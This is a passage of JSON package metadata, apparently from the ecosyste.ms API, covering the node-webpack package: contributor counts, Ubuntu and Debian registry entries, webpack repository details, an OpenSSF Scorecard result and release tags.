hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.04","url":"https://launchpad.net/ubuntu/lunar","ecosystem":"ubuntu","default":false,"packages_count":36116,"maintainers_count":0,"namespaces_count":4,"keywords_count":999,"github":"ubuntu","metadata":{"codename":"lunar","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1223},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:49.117Z","updated_at":"2026-09-02T05:06:12.919Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/namespaces"}},{"id":13523686,"name":"node-webpack","ecosystem":"debian","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-10T22:12:47.061Z","latest_release_published_at":"2026-02-10T22:12:47.061Z","latest_release_number":"4.43.0-6+deb11u1","last_synced_at":"2026-03-14T00:30:56.098Z","created_at":"2026-02-10T22:12:46.859Z","updated_at":"2026-08-23T22:03:38.475Z","registry_url":"https://tracker.debian.org/pkg/node-webpack","install_command":"apt-get install node-webpack","documentation_url":"https://packages.debian.org/bullseye/node-webpack","metadata":{"component":"main","architecture":"all","priority":"extra","binary":"webpack","standards_version":"4.5.1","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), nodejs, dh-sequence-nodejs, node-sinon \u003c!nocheck\u003e, node-acorn (\u003e= 6.0~) \u003c!nocheck\u003e, node-ajv (\u003e= 6.1~) \u003c!nocheck\u003e, node-ajv-keywords (\u003e= 3.1~) \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-enhanced-resolve (\u003e= 4.0~) \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-loader-utils (\u003e= 1.1~) \u003c!nocheck\u003e, node-memory-fs \u003c!nocheck\u003e, node-micromatch \u003c!nocheck\u003e, node-mkdirp (\u003e= 1) \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-schema-utils (\u003e= 3.0.0~) \u003c!nocheck\u003e, node-tapable (\u003e= 1.0~) \u003c!nocheck\u003e, node-uglifyjs-webpack-plugin (\u003e= 1.3.0-4~) \u003c!nocheck\u003e, node-watchpack (\u003e= 1.4~) \u003c!nocheck\u003e, node-webpack-sources \u003c!nocheck\u003e, node-resolve-cwd \u003c!nocheck\u003e, node-interpret \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-esrecurse \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://re